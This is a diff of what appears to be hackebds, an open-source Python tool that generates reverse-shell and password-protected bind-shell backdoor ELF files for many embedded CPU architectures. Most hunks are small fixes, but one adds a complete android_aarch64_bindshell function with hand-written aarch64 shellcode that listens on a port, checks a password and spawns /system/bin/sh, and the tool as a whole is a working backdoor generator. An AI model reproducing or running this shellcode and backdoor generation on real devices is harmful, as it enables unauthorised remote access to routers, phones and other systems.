@@ -70,7 +70,7 @@ def mipsel_backdoor(reverse_ip,reverse_port,filename=None):
 			context.endian="little"
 			return 
 		else:
-			print(Fore.RED+"[+]"+" be careful File existence may overwrite the file (y/n) ",end='')
+			print(Fore.RED+"[+]"+" be careful File existence may overwrite the file (y/n) "+Fore.RESET,end='')
 			choise = input()
 			if choise == "y\n" or choise == "\n":
 				log.info("waiting 3s")
@@ -140,7 +140,7 @@ def aarch64_backdoor(reverse_ip,reverse_port,filename=None):
 			context.endian="little"
 			return all_reverseshell
 		else:
-			print(Fore.RED+"[+]"+" be careful File existence may overwrite the file (y/n) ",end='')
+			print(Fore.RED+"[+]"+" be careful File existence may overwrite the file (y/n) "+Fore.RESET,end='')
 			choise = input()
 			if choise == "y\n" or choise == "\n":
 				log.info("waiting 3s")
@@ -298,7 +298,7 @@ def armelv7_backdoor(reverse_ip,reverse_port,filename=None):
 			context.bits="32"
 			context.endian="little"
 		else:
-			print(Fore.RED+"[+]"+" be careful File existence may overwrite the file (y/n) ",end='')
+			print(Fore.RED+"[+]"+" be careful File existence may overwrite the file (y/n) "+Fore.RESET,end='')
 			choise = input()
 			if choise == "y\n" or choise == "\n":
 				log.info("waiting 3s")
@@ -548,7 +548,7 @@ def armelv5_backdoor(reverse_ip,reverse_port,filename=None):
 			context.bits="32"
 			context.endian="little"
 		else:
-			print(Fore.RED+"[+]"+" be careful File existence may overwrite the file (y/n) ",end='')
+			print(Fore.RED+"[+]"+" be careful File existence may overwrite the file (y/n) "+Fore.RESET,end='')
 			choise = input()
 			if choise == "y\n" or choise == "\n":
 				log.info("waiting 3s")
@@ -957,7 +957,7 @@ def armebv7_backdoor(reverse_ip,reverse_port,filename=None):
 			context.bits="32"
 			context.endian="little"
 		else:
-			print(Fore.RED+"[+]"+" be careful File existence may overwrite the file (y/n) ",end='')
+			print(Fore.RED+"[+]"+" be careful File existence may overwrite the file (y/n) "+Fore.RESET,end='')
 			choise = input()
 			if choise == "y\n" or choise == "\n":
 				log.info("waiting 3s")
@@ -1091,7 +1091,7 @@ def armebv5_backdoor(reverse_ip,reverse_port,filename=None):
 			context.bits="32"
 			context.endian="little"
 		else:
-			print(Fore.RED+"[+]"+" be careful File existence may overwrite the file (y/n) ",end='')
+			print(Fore.RED+"[+]"+" be careful File existence may overwrite the file (y/n) "+Fore.RESET,end='')
 			choise = input()
 			if choise == "y\n" or choise == "\n":
 				log.info("waiting 3s")
@@ -1161,7 +1161,7 @@ def mips_backdoor(reverse_ip,reverse_port,filename=None):
 			context.endian="little"
 			return 
 		else:
-			print(Fore.RED+"[+]"+" be careful File existence may overwrite the file (y/n) ",end='')
+			print(Fore.RED+"[+]"+" be careful File existence may overwrite the file (y/n) "+Fore.RESET,end='')
 			choise = input()
 			if choise == "y\n" or choise == "\n":
 				log.info("waiting 3s")
@@ -1402,7 +1402,7 @@ def mips64el_backdoor(reverse_ip,reverse_port,filename=None):
 			context.bits="32"
 			context.endian="little"
 		else:
-			print(Fore.RED+"[+]"+" be careful File existence may overwrite the file (y/n) ",end='')
+			print(Fore.RED+"[+]"+" be careful File existence may overwrite the file (y/n) "+Fore.RESET,end='')
 			choise = input()
 			if choise == "y\n" or choise == "\n":
 				log.info("waiting 3s")
@@ -1535,7 +1535,7 @@ def mips64_backdoor(reverse_ip,reverse_port,filename=None):
 			context.bits="32"
 			context.endian="little"
 		else:
-			print(Fore.RED+"[+]"+" be careful File existence may overwrite the file (y/n) ",end='')
+			print(Fore.RED+"[+]"+" be careful File existence may overwrite the file (y/n) "+Fore.RESET,end='')
 			choise = input()
 			if choise == "y\n" or choise == "\n":
 				log.info("waiting 3s")
@@ -1863,7 +1863,7 @@ def riscv64el_backdoor(reverse_ip,reverse_port,filename=None):
 			context.bits="32"
 			context.endian="little"
 		else:
-			print(Fore.RED+"[+]"+" be careful File existence may overwrite the file (y/n) ",end='')
+			print(Fore.RED+"[+]"+" be careful File existence may overwrite the file (y/n) "+Fore.RESET,end='')
 			choise = input()
 			if choise == "y\n" or choise == "\n":
 				log.info("waiting 3s")
@@ -1929,7 +1929,7 @@ def android_aarch64_backdoor(reverse_ip,reverse_port,filename=None):
 			context.bits="32"
 			context.endian="little"
 		else:
-			print(Fore.RED+"[+]"+" be careful File existence may overwrite the file (y/n) ",end='')
+			print(Fore.RED+"[+]"+" be careful File existence may overwrite the file (y/n) "+Fore.RESET,end='')
 			choise = input()
 			if choise == "y\n" or choise == "\n":
 				log.info("waiting 3s")
@@ -2074,7 +2074,7 @@ def x64_bind_shell(listen_port, passwd, filename=None):
 			context.bits="32"
 			context.endian="little"
 		else:
-			print(Fore.RED+"[+]"+" be careful File existence may overwrite the file (y/n) ",end='')
+			print(Fore.RED+"[+]"+" be careful File existence may overwrite the file (y/n) "+Fore.RESET,end='')
 			choise = input()
 			if choise == "y\n" or choise == "\n":
 				log.info("waiting 3s")
@@ -2218,7 +2218,7 @@ def x86_bind_shell(listen_port, passwd, filename=None):
 			context.bits="32"
 			context.endian="little"
 		else:
-			print(Fore.RED+"[+]"+" be careful File existence may overwrite the file (y/n) ",end='')
+			print(Fore.RED+"[+]"+" be careful File existence may overwrite the file (y/n) "+Fore.RESET,end='')
 			choise = input()
 			if choise == "y\n" or choise == "\n":
 				log.info("waiting 3s")
@@ -2337,7 +2337,7 @@ def armelv7_bind_shell(listen_port, passwd, filename=None):
 			context.bits="32"
 			context.endian="little"
 		else:
-			print(Fore.RED+"[+]"+" be careful File existence may overwrite the file (y/n) ",end='')
+			print(Fore.RED+"[+]"+" be careful File existence may overwrite the file (y/n) "+Fore.RESET,end='')
 			choise = input()
 			if choise == "y\n" or choise == "\n":
 				log.info("waiting 3s")
@@ -2454,7 +2454,7 @@ def armv7eb_bind_shell(listen_port, passwd, filename = None):
 			context.bits="32"
 			context.endian="little"
 		else:
-			print(Fore.RED+"[+]"+" be careful File existence may overwrite the file (y/n) ",end='')
+			print(Fore.RED+"[+]"+" be careful File existence may overwrite the file (y/n) "+Fore.RESET,end='')
 			choise = input()
 			if choise == "y\n" or choise == "\n":
 				log.info("waiting 3s")
@@ -2511,7 +2511,7 @@ def x64el_backdoor(reverse_ip, reverse_port, filename=None):
 			context.bits="32"
 			context.endian="little"
 		else:
-			print(Fore.RED+"[+]"+" be careful File existence may overwrite the file (y/n) ",end='')
+			print(Fore.RED+"[+]"+" be careful File existence may overwrite the file (y/n) "+Fore.RESET,end='')
 			choise = input()
 			if choise == "y\n" or choise == "\n":
 				log.info("waiting 3s")
@@ -2563,7 +2563,7 @@ def x86el_backdoor(reverse_ip, reverse_port, filename =None):
 			context.bits="32"
 			context.endian="little"
 		else:
-			print(Fore.RED+"[+]"+" be careful File existence may overwrite the file (y/n) ",end='')
+			print(Fore.RED+"[+]"+" be careful File existence may overwrite the file (y/n) "+Fore.RESET,end='')
 			choise = input()
 			if choise == "y\n" or choise == "\n":
 				log.info("waiting 3s")
@@ -2683,7 +2683,7 @@ def mipsel_bind_shell(listen_port, passwd,filename = None):
 			context.bits="32"
 			context.endian="little"
 		else:
-			print(Fore.RED+"[+]"+" be careful File existence may overwrite the file (y/n) ",end='')
+			print(Fore.RED+"[+]"+" be careful File existence may overwrite the file (y/n) "+Fore.RESET,end='')
 			choise = input()
 			if choise == "y\n" or choise == "\n":
 				log.info("waiting 3s")
@@ -2801,7 +2801,7 @@ def mips_bind_shell(listen_port, passwd, filename=None ):
 			context.bits="32"
 			context.endian="little"
 		else:
-			print(Fore.RED+"[+]"+" be careful File existence may overwrite the file (y/n) ",end='')
+			print(Fore.RED+"[+]"+" be careful File existence may overwrite the file (y/n) "+Fore.RESET,end='')
 			choise = input()
 			if choise == "y\n" or choise == "\n":
 				log.info("waiting 3s")
@@ -2933,7 +2933,7 @@ def aarch64_bind_shell(listen_port, passwd, filename = None):
 			context.bits="32"
 			context.endian="little"
 		else:
-			print(Fore.RED+"[+]"+" be careful File existence may overwrite the file (y/n) ",end='')
+			print(Fore.RED+"[+]"+" be careful File existence may overwrite the file (y/n) "+Fore.RESET,end='')
 			choise = input()
 			if choise == "y\n" or choise == "\n":
 				log.info("waiting 3s")
@@ -3083,7 +3083,7 @@ def mips64el_bind_shell(listen_port, passwd, filename=None):
 			context.bits="32"
 			context.endian="little"
 		else:
-			print(Fore.RED+"[+]"+" be careful File existence may overwrite the file (y/n) ",end='')
+			print(Fore.RED+"[+]"+" be careful File existence may overwrite the file (y/n) "+Fore.RESET,end='')
 			choise = input()
 			if choise == "y\n" or choise == "\n":
 				log.info("waiting 3s")
@@ -3224,7 +3224,135 @@ def mips64_bind_shell(listen_port, passwd, filename=None):
 			context.bits="32"
 			context.endian="little"
 		else:
-			print(Fore.RED+"[+]"+" be careful File existence may overwrite the file (y/n) ",end='')
+			print(Fore.RED+"[+]"+" be careful File existence may overwrite the file (y/n) "+Fore.RESET,end='')
+			choise = input()
+			if choise == "y\n" or choise == "\n":
+				log.info("waiting 3s")
+				sleep(1)
+				f=open(filename,"wb")
+				f.write(ELF_data)
+				f.close()
+				os.chmod(filename, 0o755)
+				log.success("{} generated successfully".format(filename))
+				context.arch='i386'
+				context.bits="32"
+				context.endian="little"
+			else:
+				return 
+
+
+def android_aarch64_bindshell(listen_port, passwd, filename):
+	context.arch = 'aarch64'
+	context.endian = 'little'
+	context.bits = '64'
+	log.success("bind port is set to "+ str(listen_port))
+	log.success("passwd is set to '%s'"%passwd )
+	listen_port = '0x'+enhex(p16(listen_port))
+	passwd_len = hex(len(passwd))
+	#passwd = '0x'+enhex(p64(int("0x"+enhex(passwd.encode()),16)).replace(b"\x00",b'')).rjust(16,"0")
+	passwd = "0x"+enhex(p64(int("0x"+enhex(passwd.encode()),16)).replace(b"\x00",b'')).rjust(16,"0")
+	passwd_high = passwd[:6]
+	passwd_high2 = '0x'+passwd[6:10]
+	passwd_low = '0x' + passwd[10:14]
+	passwd_low2 = '0x' + passwd[14:]
+	shellcode = '''
+	mov x8, #198
+	lsr x1, x8, #7
+	lsl x0, x1, #1
+	mov x2, xzr
+	svc #0x1337
+	mvn x4, x0
+	'''
+	shellcode += '''
+	lsl  x1, x1, #1
+	movk x1, #%s , lsl #16
+	str  x1, [sp, #-8]!
+	add  x1, sp, x2
+	mov  x2, #16
+	mov  x8, #200
+	svc #0x1337
+
+	mvn  x0, x4
+	lsr  x1, x2, #3
+	mov  x8, #201
+	svc #0x1337
+	mov x5, x1
+
+	mvn  x0, x4
+	mov  x1, xzr
+	mov  x2, xzr
+	mov  x8, #202
+	svc  #0x1337
+
+
+	mvn  x4, x0
+	lsl  x1, x5, #1
+	mvn  x4, x0
+	lsr  x1, x1, #1
+	mov  x2, xzr
+	mov  x8, #24
+	svc  #0x1337
+	mov  x10, xzr
+	cmp  x10, x1
+	bne  -0x18
+	mov  x14, #24912
+	movk x14, #29555, lsl #16
+	movk x14, #25719, lsl #0x20
+	movk x14, #8250, lsl #0x30
+	mov  x15, xzr
+	stp x14, x15, [sp, #-16]!
+	mov  x1, sp
+	mvn  x0, x4
+	mov  x2, #8
+	/* call write() */
+	mov  x8, #SYS_write
+	svc 0
+
+	sub sp, sp, 0x30
+	mvn x0, x4
+	mov x1, sp
+	mov x2, #%s
+	mov x8, #0x3f
+	svc #0x1337
+
+	mov x14, #%s
+	movk x14, #%s , lsl #16
+	movk x14, #%s , lsl #0x20
+	movk x14, #%s , lsl #0x30
+
+	ldr x15, [sp,#0]!
+	cmp x15, x14
+	bne 0x1888
+	'''
+	shellcode += shellcraft.execve("/system/bin/sh",0,0)
+	shellcode = asm(shellcode % (listen_port, passwd_len, passwd_low2, passwd_low, passwd_high2, passwd_high))
+	ELF_data =make_elf(shellcode)
+	if(filename==None):
+		log.info("waiting 3s")
+		sleep(1)
+		filename=context.arch + "-bind_shell-" + my_package.random_string_generator(4,chars)
+		f=open(filename,"wb")
+		f.write(ELF_data)
+		f.close()
+		os.chmod(filename, 0o755)
+		log.success("{} is ok in current path ./".format(filename))
+		context.arch = 'i386'
+		context.bits = "32"
+		context.endian = "little"
+	else:
+		if(os.path.exists(filename) != True):
+			log.info("waiting 3s")
+			sleep(1)
+			f=open(filename,"wb")
+			f.write(ELF_data)
+			f.close()
+			os.chmod(filename, 0o755)
+			log.success("{} generated successfully".format(filename))
+			context.arch='i386'
+			context.bits="32"
+			context.endian="little"
+		else:
+			print(Fore.RED+"[+]"+" be careful File existence may overwrite the file (y/n) "+Fore.RESET,end='')
 			choise = input()
 			if choise == "y\n" or choise == "\n":
 				log.info("waiting 3s")
@@ -3242,6 +3370,7 @@ def mips64_bind_shell(listen_port, passwd, filename=None):
 
 
 
+
 '''
 this is help for print Using Help
 '''
@@ -3250,7 +3379,6 @@ def Introduction():
     If you need to obtain more functions, use the following functions (One of them can):
     1. Visit github below: https://github.com/doudoudedi/hackEmbedded
     2. help(hackebds)
-    2. Simple example: mipsel_backdoor("127.0.0.1",8899)
 	'''
 	print(example_reverse)
 
@@ -3288,7 +3416,7 @@ def x86el_backdoor(reverse_ip, reverse_port, filename=None):
 			context.bits="32"
 			context.endian="little"
 		else:
-			print(Fore.RED+"[+]"+" be careful File existence may overwrite the file (y/n) ",end='')
+			print(Fore.RED+"[+]"+" be careful File existence may overwrite the file (y/n) "+Fore.RESET,end='')
 			choise = input()
 			if choise == "y\n" or choise == "\n":
 				log.info("waiting 3s")
@@ -3340,7 +3468,7 @@ def x64el_backdoor(reverse_ip, reverse_port, filename=None):
 			context.bits="32"
 			context.endian="little"
 		else:
-			print(Fore.RED+"[+]"+" be careful File existence may overwrite the file (y/n) ",end='')
+			print(Fore.RED+"[+]"+" be careful File existence may overwrite the file (y/n) "+Fore.RESET,end='')
 			choise = input()
 			if choise == "y\n" or choise == "\n":
 				log.info("waiting 3s")
@@ -3432,7 +3560,7 @@ def test1():
 '''
 
 def get_version():
-    return Fore.GREEN+"Version: 0.2.8"+Fore.RESET
+    return Fore.GREEN+"Version: 0.3.0"+Fore.RESET
 
 
 reverse_backdoor_dic = {
@@ -3487,12 +3615,12 @@ hackebds_cmd_dic = {
 	6: hackebds_cmd.armelv7_shell_cmd,
 	7: hackebds_cmd.armebv5_shell_cmd,
 	8: hackebds_cmd.armebv7_cmd_file,
-	9: None,
-	10: None,
-	11: None,
-	12: None,
-	13: None,
-	14: None,
+	9: hackebds_cmd.aarch64_cmd_file,
+	10: hackebds_cmd.x86_cmd_file,
+	11: hackebds_cmd.x64_cmd_file,
+	12: hackebds_cmd.aarch64_cmd_file,
+	13: hackebds_cmd.riscv64el_cmd_file,
+	14: hackebds_cmd.powerpc_cmd_file,
 	15: None,
 	16: None,
 	17: None,
@@ -3511,7 +3639,7 @@ bind_shell_dic = {
 	9: aarch64_bind_shell,
 	10: x86_bind_shell,
 	11: x64_bind_shell,
-	12: None,
+	12: android_aarch64_bindshell,
 	13: None,
 	14: powerpc_info.powerpc_bind_shell,
 	15: None,
@@ -3527,7 +3655,7 @@ arch_2_num_dic ={
 	'mips': 1,
 	'mipsel': 2,
 	'mips64': 3,
-	'mipsel64': 4,
+	'mips64el': 4,
 	'armelv5': 5,
 	'armelv7': 6,
 	'armebv5': 7,
@@ -3536,7 +3664,7 @@ arch_2_num_dic ={
 	'x86': 10,
 	'x64': 11,
 	'android':  12,
-	'riscvel64': 13,
+	'riscv64': 13,
 	'powerpc':  14,
 	'powerpcle': 15,
 	'powerpc64':16,
@@ -3568,25 +3696,27 @@ def num_getbind_shell(number, listen_port, passwd, filename):
 	fun = bind_shell_dic.get(number)
 	return fun(listen_port, passwd, filename)
 
-def num_get_file_cmd(number, CMD_PATH,CMD, filename):
+def num_get_file_cmd(number, CMD_PATH,CMD, envp,filename):
 	fun = hackebds_cmd_dic.get(number)
-	return fun(CMD, CMD_PATH ,filename)
+	return fun(CMD, CMD_PATH , envp, filename)
 
 
 def main():
 	parser = argparse.ArgumentParser()
 	parser.add_argument('-reverse_ip', required=False, type=str, default=None, help='reverse_ip set')
 	parser.add_argument('-reverse_port', required=False, type=int, default=None ,help='reverse_port set')
-	parser.add_argument('-arch', required=False, type=str, help='Target arch architecturet', choices=('mips','mipsel','mips64','mipsel64','armelv5','armelv7','armebv5','armebv7','aarch64','x86','x64','android','powerpc','powerpcle','powerpc64','powerpc64le','sparc','sparc64'))
+	parser.add_argument('-arch', required=False, type=str, help='Target arch architecturet', choices=('aarch64', 'android', 'armebv5', 'armebv7', 'armelv5', 'armelv7', 'mips', 'mips64', 'mipsel', 'mips64el', 'powerpc', 'powerpc64', 'powerpc64le', 'powerpcle', 'riscv64', 'sparc', 'sparc64', 'x64', 'x86'))
 	parser.add_argument('-res', required=False,type=str,default=None, choices=('reverse_shell_file', 'reverse_shellcode', 'bind_shell','cmd_file','cveinfo'))
-	parser.add_argument('-passwd', required=False, type=str,default="1234")
+	parser.add_argument('-passwd', required=False, type=str,default="1234", help='bind_shell set connect passwd')
 	parser.add_argument('-model', required=False, type=str,default=None, help='device model,learn module')
 	parser.add_argument('-bind_port', required=False, type=int,default=None, help='bind_shell port')
 	parser.add_argument('-filename', required=False, type=str,default=None, help='Generate file name')
-	parser.add_argument('-cmd_path', required=False, type=str,default=None, help='Commands Path')
+	parser.add_argument('-cmd_path', required=False, type=str,default="/bin/sh", help='execute file path')
 	parser.add_argument('-cmd', required=False, type=str,default=None, help='Commands executed')
+	parser.add_argument('-envp', required=False, type=str,default=None, help='Commands envp')
 	parser.add_argument('-encode', '--encode' ,action='store_true', help='encode backdoor')
 	parser.add_argument('-v', '--version' ,action='version', version=get_version(), help='Display version')
+	#envp
 	#parser.add_argument("-v","--version", help="version",action="store_true")
 	#parser.add_argument('-cveinfo', action='store_true',required=False, help='Generate file name')
 	flag_cve_info = 0
@@ -3616,7 +3746,14 @@ def main():
 		flag_cve_info = 1
 		try:
 			#print("doudoudedi")
-			args.arch = model_choise.model_to_arch(args.model)
+			dic_arch = model_choise.model_to_arch(args.model)
+			if (dic_arch == args.arch):
+				args.arch = dic_arch
+			else:
+				model_choise.append_to_tree(model, args.arch)
+			#args.arch = model_choise.model_to_arch(args.model)
+			log.success("found relationship {} ------>{}".format(args.model, args.arch))
+			model_choise.print_mmodel_dic()
 			#print(args.arch)
 		except Exception as e:
 			model = args.model
@@ -3630,16 +3767,21 @@ def main():
 			log.info("Please make sure arch is set correctly, If necessary, you can modify /tmp/hackebds_model_table")
 			log.success("{} ---> {}, After that, you only need to specify {}, not the arch".format(model ,args.arch, model))
 			model_choise.append_to_tree(model, args.arch)
+			model_choise.print_mmodel_dic()
 
 	if (args.model != None and args.arch==None):
 		try:
 			flag_cve_info  = 1
 			args.arch = model_choise.model_to_arch(args.model)
+			log.success("found relationship {} ------>{}".format(args.model, args.arch))
+			model_choise.print_mmodel_dic()
 		except:
 			log.info("There is no cross reference relationship locally, please set -arch building relationships, can be edited manually /tmp/hackebds_model_table")
+			return 
 
 	if(args.model == None and args.arch==None):
 		log.error("please set arch or model")
+		return 
 
 	if (args.res == "reverse_shell_file" and args.arch != None and args.encode == False ):
 		if (args.reverse_ip!=None or args.reverse_port != None):
@@ -3650,7 +3792,8 @@ def main():
 
 			except Exception as e:
 				print(e)
-				log.info("please check your IP format and PORT ,If it is correct then The function is still under development. Please wait")
+				log.info("please check your IP format and PORT ,If it is correct then The function is still under development or environmental problems")
+				return 
 		else:
 			log.info("please set reverse_ip or reverse_port")
 			return 
@@ -3663,10 +3806,10 @@ def main():
 				
 			except Exception as e:
 				print(e)
-				log.info("please check your IP format and PORT ,If it is correct then function is still under development. Please wait")
+				log.info("please check your IP format and PORT ,If it is correct then function is still under development or environmental problems")
+				return 
 		else:
 			log.error("please set reverse_ip or reverse_port")
-			return 
 
 	if (args.res == "bind_shell"):
 		try:
@@ -3677,8 +3820,9 @@ def main():
 			num_getbind_shell(arch_get_number(args.arch), args.bind_port, args.passwd, args.filename)
 			return 
 		except Exception as e:
-			log.info("please check your IP format and PORT ,If it is correct then function is still under development. Please wait")
+			log.info("please check your IP format and PORT ,If it is correct then function is still under development or environmental problems")
 			print(e)
+			return 
 			#pass
 		
 	if (flag_cve_info == 1 and args.res=="cveinfo" ):
@@ -3688,15 +3832,18 @@ def main():
 	if (args.res == "cmd_file" and args.arch != None and args.encode == False ):
 		if(args.cmd != None):
 			try:
-				num_get_file_cmd(arch_get_number(args.arch), args.cmd_path, args.cmd,args.filename)
+				num_get_file_cmd(arch_get_number(args.arch), args.cmd_path, args.cmd, args.envp,args.filename)
 				return 
 			except Exception as e:
 				print(e)
-				pass
+				log.info("function is still under development or environmental problems")
+				return 
 		else:
 			log.info("please set command")
+			return 
 	else:
-		log.info("function is still under development. Please wait")
+		log.info("function is still under development or environmental problems")
+		return 
 
 if __name__ == "__main__":
 	main()
